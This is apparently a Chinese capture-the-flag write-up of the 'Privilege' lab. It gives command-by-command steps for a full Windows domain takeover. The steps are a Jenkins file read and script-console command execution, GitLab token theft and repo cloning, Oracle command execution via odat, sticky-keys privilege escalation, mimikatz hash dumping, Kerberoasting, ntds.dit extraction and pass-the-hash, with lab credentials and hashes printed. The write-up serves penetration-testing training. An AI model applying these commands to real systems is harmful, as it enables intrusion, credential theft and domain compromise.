渗透
春秋云镜-Privilege
flag01
请获取 XR Shop 官网源码的备份文件,并尝试获得系统上任意文件读取的能力。并且,管理员在配置 Jenkins 时,仍然选择了使用初始管理员密码,请尝试读取该密码并获取 Jenkins 服务器权限。Jenkins 配置目录为 C:\ProgramData\Jenkins.jenkins。
fscan扫一下
1 | fscan -h 39.99.141.48 |
发现有两个web服务,还有一个存在源代码泄露,我们把代码下下来看看。发现tool目录存在phpinfo和文件读取的两个文件
提示说了配置文件位置,利用这个读取文件C:\ProgramData\Jenkins.jenkins,了解一下之后知道具体文件位置为secrets/initialAdminPassword
拼接到一起后读到密码:510235cf43f14e83b88a9f144199655b
http://39.99.141.48/tools/content-log.php?logfile=C:\ProgramData\Jenkins\.jenkins\secrets/initialAdminPassword
使用admin/510235cf43f14e83b88a9f144199655b登录Jenkins
然后在访问manage目录,找到Script Console执行命令。
发现是system权限,那直接加个管理员用户进去
1 | println "net user fffffilm Password@973 /add".execute().text |
rdp上去读flag
flag01: flag{aecb6321-e65a-4f78-b879-7b6240b4eebe}
flag02
管理员为 Jenkins 配置了 Gitlab,请尝试获取 Gitlab API Token,并最终获取 Gitlab 中的敏感仓库。获取敏感信息后,尝试连接至 Oracle 数据库,并获取 ORACLE 服务器控制权限。
先不管别的,扫一下内网再说
1 | fscan -h 172.22.14.7/24 |
简单总结一下
172.22.14.7 外网(已拿下)
172.22.14.11 XR-DC
172.22.14.16 GitLab
172.22.14.31 WORKGROUP\XR-ORACLE
172.22.14.46 XIAORANG\XR-0923
发现172.22.14.16里面有个gitlab网站,再结合题目的描述,感觉就是先把gitlab拉下来,里面有XR-ORACLE的数据库密码,然后通过数据库提升权限拿flag。
读C:\ProgramData\Jenkins.jenkins\credentials.xml成功读到API Token:{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}
返回script解码token
1 | println(hudson.util.Secret.decrypt("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}")) |
得到:glpat-7kD_qLH2PiQv_ywB9hz2
看看怎么用的项目 API | 极狐GitLab
先看所有公开项目(我第一次打这个报GitLab is not responding,试了好久没找到原因,重置之后才好
1 | proxychains curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects" |jq |grep "http_url_to_repo" |
再全部拉下来
1 | proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git |
在xradmin中的ruoyi-admin/src/main/resources/application-druid.yml找到oracle账号密码
1 | url: jdbc:oracle:thin:@172.22.14.31:1521/orcl |
直接用odat梭了
1 | proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user fffffilm Password@973 /add' |
rdp上去拿flag
flag02: flag{f0777778-80a1-494e-869a-455ebe3aa846}
flag03
攻击办公区内网,获取办公 PC 控制权限,并通过特权滥用提升至 SYSTEM 权限。
internal-secret\credentials.txt里面找了域内PC的账号密码
1 | XR-0923 | zhangshuai | wSbEajHzZs |
rdp上去发现权限很低。
1 | whoami /all |
因为题目说了特权滥用,我们肯定要关注一下特权吧
1 | net user zhangshuai |
查看管理组发现是*Remote Desktop Users *Remotee Managementt Use
使用 WinRM 连接主机,会直接获取到高完整性级别并且启用所有已拥有的特权:
1 | proxychains4 evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs |
现在多了一个SeRestorePrivilege,SeRestorePrivilege授予对系统上所有对象的写访问权,而不管它们的ACL如何。
所以我们直接改注册表,利用粘滞键提权
1 | PS C:\Users\zhangshuai\Documents> ren C://windows/system32/sethc.exe C://windows/system32/sethc.bak |
将用户锁定然后按5下shift触发粘滞键即可得到system权限,拿到flag3
flag03: flag{4b6d3fa1-380d-4dc0-b20e-9f4c2fb225c3}
flag04
尝试接管备份管理操作员帐户,并通过转储 NTDS 获得域管理员权限,最终控制整个域环境。
加一个管理员账号
1 | net user fffffilm Password@973 /add |
上传猕猴桃抓哈希
1 | privilege::debug |
得到
1 | .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 |
得到ntlm哈希
1 | * Username : XR-0923$ |
向域控查询注册了SPN的用户
1 | proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes :dce5964aedcfef01a9bfab09f4389340 -dc-ip 172.22.14.11 |
获取此用户的ST
1 | proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes :dce5964aedcfef01a9bfab09f4389340 -dc-ip 172.22.14.11 -request-user tianjing |
hashcat爆破得到DPQSXSXgh2
继续使用evil-winrm登录
1 | proxychains evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2 2> /dev/null |
现在有SeBackupPrivilege权限了。
谈谈域渗透中常见的可滥用权限及其应用场景(二)-腾讯云开发者社区-腾讯云
文章 - 利用卷影拷贝服务提取ntds.dit - 先知社区
创建文件raj.dsh
1 | set context persistent nowriters |
进行格式转换
1 | unix2dos raj.dsh |
先在c盘根目录创建一个文件夹
1 | mkdir test |
上传此文件
1 | upload raj.dsh |
卷影拷贝
1 | diskshadow /s raj.dsh |
生成ntds.dit和system用于接下来的获取哈希
1 | robocopy /b z:\windows\ntds . ntds.dit |
下载文件(这一步可能有一点慢
1 | download ntds.dit |
获取哈希
1 | impacket-secretsdump -ntds ntds.dit -system system local |
PTH
1 | proxychains crackmapexec smb 172.22.14.11 -u administrator -H70c39b547b7d8adec35ad7c09fb1d277 -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt" |
flag04: flag{43ed643b-3166-477b-b700-66a41b920b35}
参考文章:
【内网渗透】最保姆级的春秋云镜Privilege打靶笔记_云镜内网-CSDN博客